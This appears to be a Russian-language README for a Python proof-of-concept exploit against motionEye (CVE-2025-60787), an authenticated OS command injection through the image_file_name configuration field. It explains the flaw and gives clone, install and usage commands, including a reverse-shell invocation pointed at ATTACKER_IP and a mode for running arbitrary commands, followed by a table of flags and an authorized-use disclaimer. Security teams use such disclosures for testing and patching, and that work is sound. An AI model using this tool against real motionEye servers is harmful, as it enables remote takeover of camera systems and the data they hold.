
Python PoC для CVE-2025-60787 — аутентифицированная RCE через внедрение OS-команд в motionEye <= 0.43.1b4 посредством несанитизированной конфигурации image_file_name
| Поле | Детали |
|---|
| CVE ID | CVE-2025-60787 |
| CVSS Score | 7.2 (High) |
| Type | OS Command Injection (CWE-78) |
| Affected | motionEye <= 0.43.1b4 |
| Fixed in | 0.43.1b5 |
motionEye принимает произвольные строки в полях конфигурации, таких как image_file_name, и записывает их напрямую в конфигурационные файлы Motion (/etc/motioneye/camera-*.conf). Когда служба Motion перезапускается, она интерпретирует эти поля как строки с раскрытием shell, что позволяет аутентифицированному злоумышленнику внедрять и выполнять произвольные команды ОС.
Веб-интерфейс включает клиентскую валидацию этих полей, но её можно тривиально обойти, отправляя поддельные API-запросы напрямую.
image_file_namecapture_mode: interval-snapshots)requestsgit clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt
Эксплойт поддерживает два режима: reverse shell и выполнение команд.
Запустите слушатель на своей машине, затем выполните:
python3 exploit.py revshell \
--url http://TARGET:8765 \
--user admin \
--password SECRET \
-i ATTACKER_IP \
--port 4444
python3 exploit.py command \
--url http://TARGET:8765 \
--user admin \
--password SECRET \
-e "id; whoami"
| Флаг | Описание |
|---|---|
--url | URL целевого motionEye, включая порт |
--user | Имя пользователя motionEye |
--password | Пароль motionEye |
-i / --host | IP-адрес слушателя (режим revshell) |
--port | Порт слушателя (режим revshell) |
-e / --exec | Команда для выполнения (режим command) |
--camera-id | Нацеливание на конкретный ID камеры |
--sh | Использовать /bin/sh вместо /bin/bash |
--no-verify | Пропустить проверку TLS-сертификата |
--proxy | Направлять трафик через прокси (например, http://127.0.0.1:8080) |
Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам противозаконен. Автор не несёт ответственности за неправомерное использование данного программного обеспечения. Всегда получайте соответствующее разрешение перед проведением тестирования.
Этот проект лицензирован в соответствии с лицензией MIT.